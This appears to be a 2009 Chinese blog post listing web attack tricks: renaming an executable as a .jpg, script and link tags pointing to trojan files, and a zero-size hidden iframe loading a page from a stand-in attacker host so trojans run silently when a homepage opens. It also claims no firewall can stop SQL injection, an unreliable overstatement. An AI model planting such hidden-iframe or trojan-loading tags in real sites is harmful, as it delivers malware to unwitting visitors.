2009年4月9日 星期四

駭客對web網頁的攻擊手法

下載檔案時:駭客將hacker.exe更改為hacker.jpg,而到user電腦時,
因為windows 預設值是不顯示副檔名,而恰好user的電腦又是設定為隱藏副檔名

利用SCRIPT標籤

LANGUAGE內容可以為除javascript,VBScript,JScript以外的字串,
漢字也可,SRC的內容為木馬程式地址,延伸名可以變通為PIF BAT COM SCR,同樣可以執行.

利用LINK標籤,代碼放在和之間<

link href="hack.exe" rel=stylesheet type=text/css><

iframe src="http://hack.er.net/hacker.htm" width="0" height="0"
frameborder="0"><

ifeame>



網站的首頁不會發生變化,但是,由於嵌入的網頁實際上已經打開了,
所以網頁上的下載木馬和執行木馬的腳本還是會隨著user首頁的打開而執行

sql injection:
一般網管人員為了達到保護網站安全,會利用架設防火牆,設計非軍事區(DMZ),
限制網站登入者的身分。但SQL Injection並非透過病毒及暴力攻擊手段,
對現階段任何防火牆或是防駭客系統而言,是無法防範的


原文網址

沒有留言:

張貼留言